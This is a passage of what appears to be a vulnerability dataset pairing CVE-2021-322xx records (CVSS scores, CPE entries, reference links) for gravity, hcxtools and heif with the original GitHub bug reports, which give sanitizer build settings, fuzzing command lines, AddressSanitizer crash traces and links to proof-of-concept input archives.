/build/glibc-e6zv40/glibc-2.23/csu/../csu/libc-start.c:291 #13 0x4217a8 in _start (/home/seviezhou/gravity/build/gravity+0x4217a8) AddressSanitizer can not provide additional info. SUMMARY: AddressSanitizer: SEGV /home/seviezhou/gravity/src/compiler/gravity_ircode.c:428:20 in ircode_add_check ==37643==ABORTING ``` ## POC [SEGV-ircode_add_check-gravity_ircode-428.zip](https://github.com/marcobambini/gravity/files/5041859/SEGV-ircode_add_check-gravity_ircode-428.zip)
A Segmentation fault in gravity_ircode.c:428:20
https://api.github.com/repos/marcobambini/gravity/issues/315/comments
1
2020-08-07T14:09:43Z
2020-08-31T08:20:03Z
https://github.com/marcobambini/gravity/issues/315
675,041,848
315
2,525
CVE-2021-32283
2021-09-20T16:15:10.607
An issue was discovered in gravity through 0.8.1. A NULL pointer dereference exists in the function gravity_string_to_value() located in gravity_value.c. It allows an attacker to cause Denial of Service.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 4.3, "confidentialityImpact": "NONE", "integrityImpact": "NONE", "vectorString": "AV:N/AC:M/Au:N/C:N/I:N/A:P", "version": "2.0" }, "exploitabilityScore": 8.6, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": true } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 5.5, "baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H", "version": "3.1" }, "exploitabilityScore": 1.8, "impactScore": 3.6, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/marcobambini/gravity/issues/314" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/marcobambini/gravity/issues/314" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:creolabs:gravity:*:*:*:*:*:*:*:*", "matchCriteriaId": "B07F7D2C-1B83-4D51-89BE-CDDCD836BA20", "versionEndExcluding": null, "versionEndIncluding": "0.8.1", "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "476" ]
476
https://github.com/marcobambini/gravity/issues/314
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "marcobambini", "gravity" ]
## System info Ubuntu x86_64, clang 6.0, gravity (latest master [ecbee9f](https://github.com/marcobambini/gravity/commit/ecbee9f06e0168b17ddb953fb08adb4b9bb19fca)) ## Configure cmake .. -DCMAKE_CXX_FLAGS="-fsanitize=address -g" -DCMAKE_C_FLAGS="-fsanitize=address -g" -DCMAKE_EXE_LINKER_FLAGS="-fsanitize=address" ## Command line ./build/gravity -o /tmp/grav -q -c @@ ## Output ``` Segmentation fault ``` ## AddressSanitizer output ``` AddressSanitizer:DEADLYSIGNAL ================================================================= ==77246==ERROR: AddressSanitizer: SEGV on unknown address 0x000000000000 (pc 0x7f62c70ba7c6 bp 0x7ffd17a4f500 sp 0x7ffd17a4ec88 T0) ==77246==The signal is caused by a READ memory access. ==77246==Hint: address points to the zero page. #0 0x7f62c70ba7c5 in strlen /build/glibc-e6zv40/glibc-2.23/string/../sysdeps/x86_64/strlen.S:76 #1 0x481f0c in __interceptor_strlen.part.32 /home/seviezhou/llvm-6.0.0/projects/compiler-rt/lib/asan/../sanitizer_common/sanitizer_common_interceptors.inc:341 #2 0x5d3d89 in gravity_string_to_value /home/seviezhou/gravity/src/shared/gravity_value.c:2382:44 #3 0x61ceca in visit_function_decl /home/seviezhou/gravity/src/compiler/gravity_codegen.c:966:32 #4 0x563b63 in gvisit /home/seviezhou/gravity/src/compiler/gravity_visitor.c #5 0x626eca in visit_postfix_expr /home/seviezhou/gravity/src/compiler/gravity_codegen.c:1571:13 #6 0x563b63 in gvisit /home/seviezhou/gravity/src/compiler/gravity_visitor.c #7 0x61dc28 in visit_function_decl /home/seviezhou/gravity/src/compiler/gravity_codegen.c:994:9 #8 0x563b63 in gvisit /home/seviezhou/gravity/src/compiler/gravity_visitor.c #9 0x626eca in visit_postfix_expr /home/seviezhou/gravity/src/compiler/gravity_codegen.c:1571:13 #10 0x563b63 in gvisit /home/seviezhou/gravity/src/compiler/gravity_visitor.c #11 0x618357 in visit_list_stmt /home/seviezhou/gravity/src/compiler/gravity_codegen.c:364:5 #12 0x563b63 in gvisit /home/seviezhou/gravity/src/compiler/gravity_visitor.c #13 0x617b08 in gravity_codegen /home/seviezhou/gravity/src/compiler/gravity_codegen.c:2042:5 #14 0x522249 in gravity_compiler_run /home/seviezhou/gravity/src/compiler/gravity_compiler.c:175:26 #15 0x51e766 in main /home/seviezhou/gravity/src/cli/gravity.c:456:19 #16 0x7f62c704f83f in __libc_start_main /build/glibc-e6zv40/glibc-2.23/csu/../csu/libc-start.c:291 #17 0x4217a8 in _start (/home/seviezhou/gravity/build/gravity+0x4217a8) AddressSanitizer can not provide additional info. SUMMARY: AddressSanitizer: SEGV /build/glibc-e6zv40/glibc-2.23/string/../sysdeps/x86_64/strlen.S:76 in strlen ==77246==ABORTING ``` ## POC [SEGV-gravity_string_to_value-gravity_value-2382.zip](https://github.com/marcobambini/gravity/files/5041852/SEGV-gravity_string_to_value-gravity_value-2382.zip)
A Segmentation fault in gravity_value.c:2382:44
https://api.github.com/repos/marcobambini/gravity/issues/314/comments
1
2020-08-07T14:07:36Z
2020-08-31T08:19:54Z
https://github.com/marcobambini/gravity/issues/314
675,040,528
314
2,526
CVE-2021-32284
2021-09-20T16:15:10.647
An issue was discovered in gravity through 0.8.1. A NULL pointer dereference exists in the function ircode_register_pop_context_protect() located in gravity_ircode.c. It allows an attacker to cause Denial of Service.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 6.8, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0" }, "exploitabilityScore": 8.6, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": true } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 7.8, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1" }, "exploitabilityScore": 1.8, "impactScore": 5.9, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/marcobambini/gravity/issues/321" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/marcobambini/gravity/issues/321" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:creolabs:gravity:*:*:*:*:*:*:*:*", "matchCriteriaId": "B07F7D2C-1B83-4D51-89BE-CDDCD836BA20", "versionEndExcluding": null, "versionEndIncluding": "0.8.1", "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "476" ]
476
https://github.com/marcobambini/gravity/issues/321
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "marcobambini", "gravity" ]
## System info Ubuntu x86_64, clang 6.0, gravity (latest master [c79e18](https://github.com/marcobambini/gravity/commit/c79e185158a2b5d8f94eec599459d9a5355993c5)) ## Configure cmake .. -DCMAKE_CXX_FLAGS="-fsanitize=address -g" -DCMAKE_C_FLAGS="-fsanitize=address -g" -DCMAKE_EXE_LINKER_FLAGS="-fsanitize=address" ## Command line ./build/gravity @@ ## AddressSanitizer output ``` AddressSanitizer:DEADLYSIGNAL ================================================================= ==75725==ERROR: AddressSanitizer: SEGV on unknown address 0x61700001045e (pc 0x000000632cf4 bp 0xfffffffffffffffc sp 0x7ffc36fe3a80 T0) ==75725==The signal is caused by a WRITE memory access. #0 0x632cf3 in ircode_register_pop_context_protect /home/seviezhou/gravity/src/compiler/gravity_ircode.c #1 0x621a1e in visit_unary_expr /home/seviezhou/gravity/src/compiler/gravity_codegen.c:1329:19 #2 0x563b63 in gvisit /home/seviezhou/gravity/src/compiler/gravity_visitor.c #3 0x621980 in visit_unary_expr /home/seviezhou/gravity/src/compiler/gravity_codegen.c:1323:5 #4 0x563b63 in gvisit /home/seviezhou/gravity/src/compiler/gravity_visitor.c #5 0x6185e7 in visit_compound_stmt /home/seviezhou/gravity/src/compiler/gravity_codegen.c:370:5 #6 0x563b63 in gvisit /home/seviezhou/gravity/src/compiler/gravity_visitor.c #7 0x6185e7 in visit_compound_stmt /home/seviezhou/gravity/src/compiler/gravity_codegen.c:370:5 #8 0x563b63 in gvisit /home/seviezhou/gravity/src/compiler/gravity_visitor.c #9 0x61dc28 in visit_function_decl /home/seviezhou/gravity/src/compiler/gravity_codegen.c:994:9 #10 0x563b63 in gvisit /home/seviezhou/gravity/src/compiler/gravity_visitor.c #11 0x621980 in visit_unary_expr /home/seviezhou/gravity/src/compiler/gravity_codegen.c:1323:5 #12 0x563b63 in gvisit /home/seviezhou/gravity/src/compiler/gravity_visitor.c #13 0x621980 in visit_unary_expr /home/seviezhou/gravity/src/compiler/gravity_codegen.c:1323:5 #14 0x563b63 in gvisit /home/seviezhou/gravity/src/compiler/gravity_visitor.c #15 0x6185e7 in visit_compound_stmt /home/seviezhou/gravity/src/compiler/gravity_codegen.c:370:5 #16 0x563b63 in gvisit /home/seviezhou/gravity/src/compiler/gravity_visitor.c #17 0x618357 in visit_list_stmt /home/seviezhou/gravity/src/compiler/gravity_codegen.c:364:5 #18 0x563b63 in gvisit /home/seviezhou/gravity/src/compiler/gravity_visitor.c #19 0x617b08 in gravity_codegen /home/seviezhou/gravity/src/compiler/gravity_codegen.c:2042:5 #20 0x522249 in gravity_compiler_run /home/seviezhou/gravity/src/compiler/gravity_compiler.c:175:26 #21 0x51e766 in main /home/seviezhou/gravity/src/cli/gravity.c:456:19 #22 0x7f2c9afa383f in __libc_start_main /build/glibc-e6zv40/glibc-2.23/csu/../csu/libc-start.c:291 #23 0x4217a8 in _start (/home/seviezhou/gravity/build/gravity+0x4217a8) AddressSanitizer can not provide additional info. SUMMARY: AddressSanitizer: SEGV /home/seviezhou/gravity/src/compiler/gravity_ircode.c in ircode_register_pop_context_protect ==75725==ABORTING ``` ## POC [SEGV-ircode_register_pop_context_protect-gravity_ircode.zip](https://github.com/marcobambini/gravity/files/5147137/SEGV-ircode_register_pop_context_protect-gravity_ircode.zip)
A Segmentation fault in gravity_ircode.c
https://api.github.com/repos/marcobambini/gravity/issues/321/comments
1
2020-08-30T16:46:44Z
2020-08-31T08:20:39Z
https://github.com/marcobambini/gravity/issues/321
688,751,618
321
2,527
CVE-2021-32285
2021-09-20T16:15:10.690
An issue was discovered in gravity through 0.8.1. A NULL pointer dereference exists in the function list_iterator_next() located in gravity_core.c. It allows an attacker to cause Denial of Service.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 4.3, "confidentialityImpact": "NONE", "integrityImpact": "NONE", "vectorString": "AV:N/AC:M/Au:N/C:N/I:N/A:P", "version": "2.0" }, "exploitabilityScore": 8.6, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": true } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 5.5, "baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H", "version": "3.1" }, "exploitabilityScore": 1.8, "impactScore": 3.6, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/marcobambini/gravity/issues/319" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/marcobambini/gravity/issues/319" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:creolabs:gravity:*:*:*:*:*:*:*:*", "matchCriteriaId": "B07F7D2C-1B83-4D51-89BE-CDDCD836BA20", "versionEndExcluding": null, "versionEndIncluding": "0.8.1", "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "476" ]
476
https://github.com/marcobambini/gravity/issues/319
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "marcobambini", "gravity" ]
## System info Ubuntu x86_64, clang 6.0, gravity (latest master [c79e18](https://github.com/marcobambini/gravity/commit/c79e185158a2b5d8f94eec599459d9a5355993c5)) ## Configure cmake .. -DCMAKE_CXX_FLAGS="-fsanitize=address -g" -DCMAKE_C_FLAGS="-fsanitize=address -g" -DCMAKE_EXE_LINKER_FLAGS="-fsanitize=address" ## Command line ./build/gravity @@ ## AddressSanitizer output ``` AddressSanitizer:DEADLYSIGNAL ================================================================= ==22249==ERROR: AddressSanitizer: SEGV on unknown address 0x000000000010 (pc 0x0000005760de bp 0x7fffd48f3730 sp 0x7fffd48f34b0 T0) ==22249==The signal is caused by a READ memory access. ==22249==Hint: address points to the zero page. #0 0x5760dd in list_iterator_next /home/seviezhou/gravity/src/runtime/gravity_core.c:1100:5 #1 0x5a4053 in gravity_vm_exec /home/seviezhou/gravity/src/runtime/gravity_vm.c:1236:39 #2 0x5c4ec1 in gravity_vm_loadclosure /home/seviezhou/gravity/src/runtime/gravity_vm.c:1655:5 #3 0x5c4ec1 in gravity_vm_runmain /home/seviezhou/gravity/src/runtime/gravity_vm.c:1784 #4 0x51e8ef in main /home/seviezhou/gravity/src/cli/gravity.c:481:9 #5 0x7fcdc0ec883f in __libc_start_main /build/glibc-e6zv40/glibc-2.23/csu/../csu/libc-start.c:291 #6 0x4217a8 in _start (/home/seviezhou/gravity/build/gravity+0x4217a8) AddressSanitizer can not provide additional info. SUMMARY: AddressSanitizer: SEGV /home/seviezhou/gravity/src/runtime/gravity_core.c:1100:5 in list_iterator_next ==22249==ABORTING ``` ## POC [SEGV-list_iterator_next-gravity_core-1100.zip](https://github.com/marcobambini/gravity/files/5147119/SEGV-list_iterator_next-gravity_core-1100.zip)
A Segmentation fault in gravity_core.c:1100:5
https://api.github.com/repos/marcobambini/gravity/issues/319/comments
1
2020-08-30T16:37:45Z
2020-08-31T08:20:23Z
https://github.com/marcobambini/gravity/issues/319
688,750,158
319
2,528
CVE-2021-32286
2021-09-20T16:15:10.737
An issue was discovered in hcxtools through 6.1.6. A global-buffer-overflow exists in the function pcapngoptionwalk located in hcxpcapngtool.c. It allows an attacker to cause code Execution.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 6.8, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0" }, "exploitabilityScore": 8.6, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": true } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 7.8, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1" }, "exploitabilityScore": 1.8, "impactScore": 5.9, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Patch", "Third Party Advisory" ], "url": "https://github.com/ZerBea/hcxtools/issues/155" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Patch", "Third Party Advisory" ], "url": "https://github.com/ZerBea/hcxtools/issues/155" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:hcxtools_project:hcxtoold:*:*:*:*:*:*:*:*", "matchCriteriaId": "2464705C-CFC5-4E7E-AC0C-9402A0838E32", "versionEndExcluding": null, "versionEndIncluding": "6.1.6", "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "787" ]
787
https://github.com/ZerBea/hcxtools/issues/155
[ "Exploit", "Issue Tracking", "Patch", "Third Party Advisory" ]
github.com
[ "ZerBea", "hcxtools" ]
## System info Ubuntu x86_64, clang 6.0, hcxpcapngtool (latest master [e6b738](https://github.com/ZerBea/hcxtools/commit/e6b738c0fb905c40fae14c03b64fccf69919356e)) ## Configure CFLAGS="-g -fsanitize=address" LDFLAGS="-fsanitize=address" make ## Command line ./hcxpcapngtool --all -o /dev/null @@ ## AddressSanitizer output ``` ================================================================= ==24965==ERROR: AddressSanitizer: global-buffer-overflow on address 0x00000149db60 at pc 0x0000004ddcc5 bp 0x7ffffd559690 sp 0x7ffffd558e40 WRITE of size 1536 at 0x00000149db60 thread T0 #0 0x4ddcc4 in __asan_memcpy /home/seviezhou/llvm-6.0.0/projects/compiler-rt/lib/asan/asan_interceptors_memintrinsics.cc:23 #1 0x522c14 in pcapngoptionwalk /home/seviezhou/hcxtools/hcxpcapngtool.c:3789:4 #2 0x5247d1 in processpcapng /home/seviezhou/hcxtools/hcxpcapngtool.c:4083:3 #3 0x526c36 in processcapfile /home/seviezhou/hcxtools/hcxpcapngtool.c:4191:3 #4 0x526c36 in main /home/seviezhou/hcxtools/hcxpcapngtool.c:4896 #5 0x7f973984483f in __libc_start_main /build/glibc-e6zv40/glibc-2.23/csu/../csu/libc-start.c:291 #6 0x41ab58 in _start (/home/seviezhou/hcxtools/hcxpcapngtool+0x41ab58) 0x00000149db60 is located 0 bytes to the right of global variable 'nmeasentence' defined in 'hcxpcapngtool.c:284:13' (0x149d760) of size 1024 SUMMARY: AddressSanitizer: global-buffer-overflow /home/seviezhou/llvm-6.0.0/projects/compiler-rt/lib/asan/asan_interceptors_memintrinsics.cc:23 in __asan_memcpy Shadow bytes around the buggy address: 0x00008028bb10: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x00008028bb20: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x00008028bb30: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x00008028bb40: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x00008028bb50: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 =>0x00008028bb60: 00 00 00 00 00 00 00 00 00 00 00 00[f9]f9 f9 f9 0x00008028bb70: f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 0x00008028bb80: f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 00 f9 f9 f9 0x00008028bb90: f9 f9 f9 f9 00 f9 f9 f9 f9 f9 f9 f9 00 f9 f9 f9 0x00008028bba0: f9 f9 f9 f9 04 f9 f9 f9 f9 f9 f9 f9 04 f9 f9 f9 0x00008028bbb0: f9 f9 f9 f9 04 f9 f9 f9 f9 f9 f9 f9 00 f9 f9 f9 Shadow byte legend (one shadow byte represents 8 application bytes): Addressable: 00 Partially addressable: 01 02 03 04 05 06 07 Heap left redzone: fa Freed heap region: fd Stack left redzone: f1 Stack mid redzone: f2 Stack right redzone: f3 Stack after return: f5 Stack use after scope: f8 Global redzone: f9 Global init order: f6 Poisoned by user: f7 Container overflow: fc Array cookie: ac Intra object redzone: bb ASan internal: fe Left alloca redzone: ca Right alloca redzone: cb ==24965==ABORTING ``` ## POC [global-overflow-pcapngoptionwalk-hcxpcapngtool-3789.zip](https://github.com/ZerBea/hcxtools/files/5060398/global-overflow-pcapngoptionwalk-hcxpcapngtool-3789.zip)
A global-buffer-overflow in hcxpcapngtool.c:3789:4
https://api.github.com/repos/ZerBea/hcxtools/issues/155/comments
7
2020-08-12T03:09:27Z
2021-09-21T15:30:32Z
https://github.com/ZerBea/hcxtools/issues/155
677,347,117
155
2,529
CVE-2021-32287
2021-09-20T16:15:10.783
An issue was discovered in heif through v3.6.2. A global-buffer-overflow exists in the function HevcDecoderConfigurationRecord::getPicWidth() located in hevcdecoderconfigrecord.cpp. It allows an attacker to cause code Execution.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 6.8, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0" }, "exploitabilityScore": 8.6, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": true } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 7.8, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1" }, "exploitabilityScore": 1.8, "impactScore": 5.9, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/nokiatech/heif/issues/86" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/nokiatech/heif/issues/86" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:nokia:heif:*:*:*:*:*:*:*:*", "matchCriteriaId": "665D3535-EF3B-45AF-9DE9-8A7AF5A34D4F", "versionEndExcluding": null, "versionEndIncluding": "3.6.2", "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "787" ]
787
https://github.com/nokiatech/heif/issues/86
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "nokiatech", "heif" ]
## System info Ubuntu X64, gcc (Ubuntu 5.5.0-12ubuntu1), heif (latest master [2fc78e](https://github.com/nokiatech/heif/commit/2fc78e4c80e9dbd22b5b0e09c137985d21d75512)) ## Configure cmake ../srcs -DCMAKE_CXX_FLAGS="-fsanitize=address -g" -DCMAKE_C_FLAGS="-fsanitize=address -g" -DCMAKE_EXE_LINKER_FLAGS="-fsanitize=address" ## Command line modify example.cpp, use example7() to receive filename from commandline. ./build/bin/example @@ ## AddressSanitizer output ``` ================================================================= ==13667==ERROR: AddressSanitizer: global-buffer-overflow on address 0x000000953646 at pc 0x0000008202aa bp 0x7fff634d9ae0 sp 0x7fff634d9ad8 READ of size 2 at 0x000000953646 thread T0 #0 0x8202a9 in HevcDecoderConfigurationRecord::getPicWidth() const /home/seviezhou/heif/srcs/common/hevcdecoderconfigrecord.cpp:311:37 #1 0x8826a9 in HEIF::WriterImpl::getConfigIndex(HEIF::DecoderConfigId, unsigned short&) /home/seviezhou/heif/srcs/writer/writermetaimpl.cpp:1199:70 #2 0x87e1bf in HEIF::WriterImpl::addImage(HEIF::MediaDataId const&, HEIF::ImageId&) /home/seviezhou/heif/srcs/writer/writermetaimpl.cpp:199:31 #3 0x52072f in main /home/seviezhou/heif/srcs/examples/example.cpp:104:29 #4 0x7f2f25a0083f in __libc_start_main /build/glibc-e6zv40/glibc-2.23/csu/../csu/libc-start.c:291 #5 0x41f0b8 in _start (/home/seviezhou/heif/build/bin/example+0x41f0b8) 0x000000953646 is located 26 bytes to the left of global variable 'subHeightC' defined in '/home/seviezhou/heif/srcs/common/hevcdecoderconfigrecord.cpp:316:20' (0x953660) of size 8 0x000000953646 is located 30 bytes to the right of global variable 'subWidthC' defined in '/home/seviezhou/heif/srcs/common/hevcdecoderconfigrecord.cpp:310:20' (0x953620) of size 8 SUMMARY: AddressSanitizer: global-buffer-overflow /home/seviezhou/heif/srcs/common/hevcdecoderconfigrecord.cpp:311:37 in HevcDecoderConfigurationRecord::getPicWidth() const Shadow bytes around the buggy address: 0x000080122670: f9 f9 f9 f9 00 00 00 00 00 00 00 00 00 00 00 00 0x000080122680: 00 00 00 00 00 00 00 00 00 00 00 00 00 07 f9 f9 0x000080122690: f9 f9 f9 f9 00 00 00 00 00 00 00 00 00 00 00 00 0x0000801226a0: 00 00 00 00 00 00 07 f9 f9 f9 f9 f9 00 00 00 00 0x0000801226b0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 =>0x0000801226c0: 00 00 00 00 00 f9 f9 f9[f9]f9 f9 f9 00 f9 f9 f9 0x0000801226d0: f9 f9 f9 f9 00 00 00 00 01 f9 f9 f9 f9 f9 f9 f9 0x0000801226e0: 00 00 00 00 00 00 00 00 00 02 f9 f9 f9 f9 f9 f9 0x0000801226f0: 00 00 00 00 00 00 00 00 00 00 f9 f9 f9 f9 f9 f9 0x000080122700: 00 00 00 02 f9 f9 f9 f9 00 00 00 f9 f9 f9 f9 f9 0x000080122710: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Shadow byte legend (one shadow byte represents 8 application bytes): Addressable: 00 Partially addressable: 01 02 03 04 05 06 07 Heap left redzone: fa Freed heap region: fd Stack left redzone: f1 Stack mid redzone: f2 Stack right redzone: f3 Stack after return: f5 Stack use after scope: f8 Global redzone: f9 Global init order: f6 Poisoned by user: f7 Container overflow: fc Array cookie: ac Intra object redzone: bb ASan internal: fe Left alloca redzone: ca Right alloca redzone: cb ==13667==ABORTING ``` ## POC [global-overflow-getPicWidth-hevcdecoderconfigrecord-311.zip](https://github.com/nokiatech/heif/files/5020869/global-overflow-getPicWidth-hevcdecoderconfigrecord-311.zip)
A global-buffer-overflow in hevcdecoderconfigrecord.cpp:311:37
https://api.github.com/repos/nokiatech/heif/issues/86/comments
1
2020-08-04T07:58:10Z
2020-08-12T09:12:35Z
https://github.com/nokiatech/heif/issues/86
672,589,184
86
2,530
CVE-2021-32288
2021-09-20T16:15:10.827
An issue was discovered in heif through v3.6.2. A global-buffer-overflow exists in the function HevcDecoderConfigurationRecord::getPicHeight() located in hevcdecoderconfigrecord.cpp. It allows an attacker to cause code Execution.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 6.8, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0" }, "exploitabilityScore": 8.6, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": true } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 7.8, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1" }, "exploitabilityScore": 1.8, "impactScore": 5.9, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
